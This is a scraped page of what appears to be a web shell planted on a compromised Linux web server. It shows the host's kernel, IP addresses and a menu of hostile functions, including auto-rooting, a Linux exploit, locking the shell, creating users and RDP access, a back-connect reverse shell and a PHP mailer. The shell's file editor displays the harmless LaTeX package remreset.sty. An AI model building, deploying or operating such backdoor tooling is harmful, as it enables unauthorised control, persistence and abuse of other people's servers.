Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
texlive /
texmf-dist /
tex /
latex /
carlisle /
[ HOME SHELL ]
Name
Size
Permission
Action
dotlessj.sty
3.06
KB
-rw-r--r--
ltxtable.sty
3.86
KB
-rw-r--r--
plain.sty
7.55
KB
-rw-r--r--
remreset.sty
1.34
KB
-rw-r--r--
scalefnt.sty
1.33
KB
-rw-r--r--
slashed.sty
5.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : remreset.sty
% remreset package %%%%%%%%%%%%%%%%%% % Copyright 1997, 2018 David carlisle % This file may be distributed under the terms of the LPPL. % See README.txt for details. % 2018/04/01 David Carlisle % 1997/09/28 David Carlisle % LaTeX includes a command \@addtoreset that is used to declare that % a counter should be reset every time a second counter is incremented. % For example the book class has a line % \@addtoreset{footnote}{chapter} % So that the footnote counter is reset each chapter. % If you wish to base a new class on book, but without this counter % being reset, then standard LaTeX gives no simple mechanism to do % this. % This package defines |\@removefromreset| which just undoes the effect % of \@addtoreset. So for example a class file may be defined by % \LoadClass{book} % \@removefromreset{footnote}{chapter} % 2018: package obsoleted as the command is defined in the LaTeX format. \@ifundefined{@removefromreset}{% \def\@removefromreset#1#2{{% \expandafter\let\csname c@#1\endcsname\@removefromreset \def\@elt##1{% \expandafter\ifx\csname c@##1\endcsname\@removefromreset \else \noexpand\@elt{##1}% \fi}% \expandafter\xdef\csname cl@#2\endcsname{% \csname cl@#2\endcsname}}}% }{% \PackageWarningNoLine{remreset} {The remreset package is obsolete:\MessageBreak \noexpand\@removefromreset is defined}% }
Close